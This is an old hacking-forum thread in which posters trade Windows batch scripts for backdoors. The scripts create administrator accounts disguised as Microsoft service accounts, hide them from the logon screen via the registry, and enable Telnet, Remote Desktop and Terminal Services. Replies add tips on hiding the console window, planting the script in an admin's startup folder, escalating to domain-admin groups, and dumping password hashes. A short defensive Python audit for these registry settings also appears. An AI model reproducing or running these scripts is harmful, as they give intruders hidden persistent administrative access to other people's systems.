If you have any suggestion to make it better, post your ideas here.
A suggestion: make it so that it pops up a question to ask the user what the password is.
Of course, since you say it's open source, why not just say "You can create your own such file by typing this stuff into Notepad and then saving it as blat.cmd (or blat.bat for that matter)". If people want to know what it's doing, use "net help user" in any cmd window.
CODE
@echo off
net user IUSR_WAN /add /expires:never
net localgroup administrators /add IUSR_REMOTE
net user IUSR_WAN herman
net user IUSR_WAN /comment:"Built-in account for Remote Service"
net user IUSR_WAN /fullname:"Remote Service Account"
As for comments: that password is very insecure and should never be used on an internet-connected system. Also, your bad copy/pasting means that you add a different user to the administrators group... woops.... bad boy!
hercules
Nov 16 2004, 10:55 PM
Thanks for the bad typo, link updated.
We are working to make it a tool.
HermanGroup
Nov 16 2004, 10:58 PM
About:
=======
User-CMD Tools is a simple program that uses NET USER commands to add, delete or modify an administrator user account on Windows NT/2K/XP/2003.
From Net Help : "NET USER creates and modifies user accounts on computers. When used without switches, it lists the user accounts for the computer. The user account information is stored in the user accounts database."
username                Is the name of the user account to add, delete, modify, or view. The name of the user account can have as many as 20 characters.
password                Assigns or changes a password for the user's account. A password must satisfy the minimum length set with the /MINPWLEN option of the NET ACCOUNTS command. It can have as many as 14 characters.
/ADD                    Adds a user account to the user accounts database.
/DELETE                 Removes a user account from the user accounts database.
/FULLNAME:"name"        Is a user's full name (rather than a username). Enclose the name in quotation marks.
/COMMENT:"text"         Provides a descriptive comment about the user's account. Enclose the text in quotation marks.
/EXPIRES:{date | NEVER} Causes the account to expire if date is set. NEVER sets no time limit on the account. An expiration date is in the form mm/dd/yy(yy). Months can be a number, spelled out, or abbreviated with three letters. Year can be two or four numbers. Use slashes (/) (no spaces) to separate parts of the date.
Better code for XP: this will create the account and make it not visible on the login screen.
CODE
@echo off
net user illwill password /add && net localgroup administrators illwill /add
echo Windows Registry Editor Version 5.00> c:\hide.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\hide.reg
echo "illwill"=dword:00000000>> c:\hide.reg
REGEDIT /S c:\hide.REG
DEL /Q c:\hide.REG
Exit
Or, at a shell prompt, one simple copy-paste:
CODE
net user illwill password /add && net localgroup administrators illwill /add && echo Windows Registry Editor Version 5.00> c:\hide.reg && echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\hide.reg && echo "illwill"=dword:00000000>> c:\hide.reg && REGEDIT /S c:\hide.REG && DEL /Q c:\hide.REG
Of course you can also modify this to look like some Microsoft-added user account too.
w00dy
Nov 17 2004, 03:17 AM
CODE
@echo off
net user UserName /add /expires:never * /comment:"User Name Account" /fullname:"User Name"
net localgroup administrators /add UserName
Will add it, NOT HIDE IT, and prompt for password.
HermanGroup
Nov 17 2004, 11:09 PM
Get the tools and give me more ideas to add to it!
why not just net user IUSR_REMOTE herman /add /expires:never /comment:"Built-in account for Remote Service" /fullname:"Remote Service Account" && net localgroup administrators IUSR_REMOTE /add
FiNaLBeTa
Nov 19 2004, 11:09 PM
QUOTE(illwill @ Nov 17 2004, 02:24 AM)
Better code for XP: this will create the account and make it not visible on the login screen.
Yeah, I made a simple batch file that can do the same. Bit of a GUI batch I did for making some accounts on my home network for sharing; didn't want the account to show on the login screen.
CODE
@ECHO off
TITLE XP Acount creator ( FiNaLBeTa @ NFE )
COLOR 0f
set AC_PART=001
:HEADER
echo.
ECHO [INFO]
ECHO [-] Create a hidden user acount (U:%AC_NAME%; P:%AC_PASS%; G:%AC_GROUP%; H:%AC_HIDE% )
echo \
GOTO %AC_PART%

:001
SET /P AC_NAME= [*] Acount name? :
cls
SET AC_PART=002
GOTO HEADER

:002
SET /P AC_PASS= [*] Acount password? :
cls
SET AC_PART=003
GOTO HEADER

:003
SET /P AC_COMMENT= [*] Acount Comment? :
cls
SET AC_PART=004
GOTO HEADER

:004
ECHO [* The following groups are available on the machine.
ECHO.
net localgroup | find "*"
ECHO.
SET /P AC_GROUP= [*] Group? :
cls
SET AC_PART=005
GOTO HEADER

:005
SET /P AC_OK= [*] Creating acount now, Continue? (y/n) :
IF NOT %AC_OK%==y GOTO 0051
net user %AC_NAME% %AC_PASS% /add /COMMENT:"%AC_COMMENT%"
net localgroup "%AC_GROUP%" %AC_NAME% /add
ECHO.
pause

:0051
cls
SET AC_PART=006
GOTO HEADER

:006
SET /P AC_HIDE= [*] Do you want to hide the acount from the XP logon screen? (y/n) :
IF NOT %AC_HIDE%==y GOTO END
echo Windows Registry Editor Version 5.00>%TEMP%\addregistry.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>>%TEMP%\addregistry.reg
echo "%AC_NAME%"=dword:00000000>>%TEMP%\addregistry.reg
Regedit /s %TEMP%\addregistry.reg
Del %TEMP%\addregistry.reg
:END
ECHO.
pause
Katja
Nov 19 2004, 11:44 PM
FiNaLBeTa, your batch looks nice, thank you.
Paul
Nov 20 2004, 09:45 AM
You can't do that when you don't have admin access already...
hercules
Dec 6 2004, 09:04 AM
QUOTE
You can't do that when you don't have admin access already...
Cmd commands always work when you have admin access only
hercules
Dec 6 2004, 09:09 AM
FiNaLBeTa, your code looks very nice.
Chinzo
Dec 6 2004, 01:41 PM
Yes, many interesting scripts, many thanks for that; I have learned funny commands.
r00t
Dec 22 2004, 11:11 AM
Hi m8's
Thx for the HIDE tip @ illwill. And also a lot of thanks for the batch file from FiNaLBeTa.
Looks nice and I could learn something from it.
Thx.
rasraven
Dec 22 2004, 12:16 PM
Just combine it with a script that enables Telnet or Remote Desktop and you have a perfect backdoor with just a batch file.
Telnet
CODE
@echo off
rem Enable Telnet as Backdoor on 2k
@echo REGEDIT4>temp.reg
echo. >>temp.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSvr]>>temp.reg
echo. >>temp.reg
echo "ErrorControl"=dword:00000001>>temp.reg
echo "Start"=dword:00000002>>temp.reg
echo "Type"=dword:00000010>>temp.reg
echo "FailureActions"=hex:00,00,00,00,00,00,00,00,00,00,00,00,03,00,00,00,38,65,11,00,01,00,00,00,60,ea,00,00,01,00,00,00,60,ea,00,00,01,00,00,00,60,ea,00,00>>temp.reg
echo. >>temp.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0]>>temp.reg
echo. >>temp.reg
echo "NTLM"=dword:00000001>>temp.reg
echo "TelnetPort"=dword:0000ffff>>temp.reg
echo.
regedit /s temp.reg
echo Starting Service
net start tlntsvr
echo cleanup
del temp.reg
del install.cmd
exit
RemoteDesktop
CODE
rem enable RemoteDesktop on Win XP
echo Windows Registry Editor Version 5.00> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> c:\TS.reg
echo "fDenyTSConnections"=dword:00000000>> c:\TS.reg
echo "fAllowToGetHelp"=dword:00000000>> c:\TS.reg
regedit /s c:\TS.reg
del c:\TS.reg
Terminal Service
CODE
REM Auto Terminal Service enabler (works on XP/2000/2003)
@echo off
echo Windows Registry Editor Version 5.00> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]>> c:\TS.reg
echo "Start"=dword:00000002>> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> c:\TS.reg
echo "AllowTSConnections"=dword:00000001>> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> c:\TS.reg
echo "fDenyTSConnections"=dword:00000000>> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> c:\TS.reg
echo "fAllowToGetHelp"=dword:00000001>> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>> c:\TS.reg
echo "AllowMultipleTSSessions"=dword:00000001>> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>> c:\TS.reg
echo "AutoAdminLogon"="1">> c:\TS.reg
@echo --[ Registering the service... ]
echo.
REGEDIT /S C:\TS.REG
REGEDIT -S C:\TS.REG
echo [Components] > c:\bootlog~.txt
echo TSEnabled = on >> c:\bootlog~.txt
sysocmgr /i:%windir%\inf\sysoc.inf /u:c:\bootlog~.txt /q
DEL /Q c:\TS.REG
DEL /Q c:\bootlog~.txt
echo.
exit
Hope it's useful.
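A defender-side check, added here and not taken from any poster in this thread: a Python audit that parses a .reg export and reports the exact settings FiNaLBeTa's hide trick and rasraven's Telnet/Remote Desktop scripts write (accounts under SpecialAccounts\UserList set to 0, fDenyTSConnections, TlntSvr Start, AutoAdminLogon). The key paths and value names are those quoted in the posts above; the sample export is constructed, not from a real machine.

```python
import re

# Constructed sample .reg export (not from a real machine): the keys the batch files in this thread write.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"illwill"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSvr]
"Start"=dword:00000002
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AutoAdminLogon"="1"
"""

WINLOGON = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
USERLIST = WINLOGON + r"\SpecialAccounts\UserList"
# (key, value name, value the scripts above set, what that value means)
WATCHLIST = [
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server",
     "fDenyTSConnections", 0, "Remote Desktop connections allowed"),
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSvr",
     "Start", 2, "Telnet service set to start automatically"),
    (WINLOGON, "AutoAdminLogon", "1", "automatic logon enabled"),
]
VALUE_RE = re.compile(r'^"([^"]+)"=(?:dword:([0-9a-fA-F]{8})|"(.*)")$')

def parse_reg(text):
    """Map key path -> {value name: int or str}; only dword and string values are handled."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current and (m := VALUE_RE.match(line)):
            name, dword, string = m.groups()
            keys[current][name] = int(dword, 16) if dword is not None else string
    return keys

def audit(text):
    """Return findings for hidden accounts and the remote-access settings in WATCHLIST."""
    keys = parse_reg(text)
    findings = [f"account '{n}' hidden from logon screen"  # dword 0 under UserList hides it
                for n, v in keys.get(USERLIST, {}).items() if v == 0]
    for key, name, flagged, why in WATCHLIST:
        if keys.get(key, {}).get(name) == flagged:
            short = key.split("\\")[-1]  # last path component, e.g. TlntSvr
            findings.append(f"{short}\\{name}: {why}")
    return findings
```

On a live box the same check runs against the output of `reg export` for those keys; a clean machine returns an empty list.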
simply-me
Dec 26 2004, 04:31 AM
Well, this can be useful if you don't have NTFS on a machine: put this in the admin's startup dir, and whenever he logs in next you've got an admin account too. But what about the big black box he sees at startup? Maybe make a VB prog with something like
CODE
Shell "temp.bat", vbHide
And also add some code to delete both files after this is done.
Is there a better way to hide the DOS window?
hercules
Jan 7 2005, 10:27 AM
Thanks for the batch file, Rasraven.
Terminal Service & Remote Desktop work exactly, but the Telnet service activates when the system is restarted in Windows XP.
Booster2ooo
Jan 10 2005, 04:03 PM
rasraven: Your scripts seem to be cool but don't seem to work ...
Telnet: "FailureActions"=hex '#58' is not recognised as a cmd ... (smth like that) 'a' is not recognised ...
RemoteDesk & Termserv: The batch processing is ok, but they don't seem to be activated ... and I presume there is no space in echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\TermService]>> c:\TS.reg
and in other cmds
itchy2000
Jan 11 2005, 05:48 AM
Nice work on the batch files guys, learning a lot from this
KeKeTTe
Jan 11 2005, 01:35 PM
very interesting post thx u all
whi7er
Feb 3 2005, 02:27 PM
I should say any .cmd/.bat is always open source. Anyway thanks!
Enz0s
Feb 3 2005, 08:49 PM
thanks for bat files
roxi
Feb 3 2005, 09:02 PM
good work...
Bedosman
Feb 3 2005, 10:10 PM
Yeah, very very interesting.
I've learned some very cool commands.
Thx to all for sharing your knowledge
t_gillum
Feb 3 2005, 11:48 PM
Yeah, you may not be able to do it if you have admin rights, but you can make a schedule to execute the batch file using the at command under Windows XP; then the system will call the script and, well, do anything you like. This is why Task Scheduler is so dangerous in Windows, because when it calls the task it runs whatever it is with SYSTEM privileges, not the user that created the task. In theory of course.
dijk
Feb 6 2005, 12:56 AM
This is indeed a very handy topic..... didn't know all of it... learnt some nice stuff here..... thx a bundle
Just use pwdump4 to get hashes and then crack the hashes... and bam, you've got the admin pass, so I don't know any reason why you should add your own user account
grtz
hercules
Feb 12 2005, 08:47 PM
User-CMD Tools is a simple program that uses NET USER commands to add, delete or modify an administrator user account on Windows NT/2K/XP/2003.
Everyone can download this from the Herman Group site.
Fletcher
Feb 12 2005, 09:35 PM
very interesting, thx a lot for everybody
andream
Mar 18 2005, 10:18 PM
Does the task schedule even work if I'm at the login screen and haven't logged in yet? Sorry, I don't know much about this.
DumpZ
Mar 22 2005, 07:54 AM
QUOTE(rasraven @ Dec 22 2004, 12:16 PM)
Just combine it with a script that enables Telnet or Remote Desktop and you have a perfect backdoor with just a batch file.
That Terminal Server part probably won't work without the CD, unless you already have the file in place.
Terminal
Mar 22 2005, 03:10 PM
QUOTE(DumpZ @ Mar 22 2005, 01:24 PM)
That Terminal Server part probably won't work without the CD, unless you already have the file in place.
It works without asking for the CD. I have tried it on a few default XP Professional machines and 3389 opens and I'm able to connect to them.
HermanGroup
Apr 6 2005, 12:14 PM
OK guys.. I released the Delphi cool source code for it, which makes an executable file and compresses it well.
In the attack against domain controllers, you can create the batch file USER2.CMD with the following contents:
CODE
@echo off
NET USER "IUSR_WAN" "password" /ADD /ACTIVE:YES /EXPIRES:NEVER
NET LOCALGROUP "Administrators" "IUSR_WAN" /ADD
NET GROUP "Domain Admins" "IUSR_WAN" /ADD
NET GROUP "Enterprise Admins" "IUSR_WAN" /ADD
NET GROUP "Schema Admins" "IUSR_WAN" /ADD
NET GROUP "Group Policy Creator Owners" "IUSR_WAN" /ADD
NET USER IUSR_WAN /comment:"Built-in account for Remote Service"
NET USER IUSR_WAN /fullname:"Remote Service Account"
Note:
In this scenario, in the attack against domain controllers, the domain under attack is the forest root domain.
isaiah
Jul 16 2005, 07:07 PM
Well, one thing to say: none of this will work if you do not already have admin rights. Let's say you are trying to gain admin locally; it will not work if you don't already have it. But if you already have it, why not just go add yourself....
DarkRider
Jul 17 2005, 12:07 AM
You guys are missing one thing. It doesn't work on local versions. Nolimit's way is better then.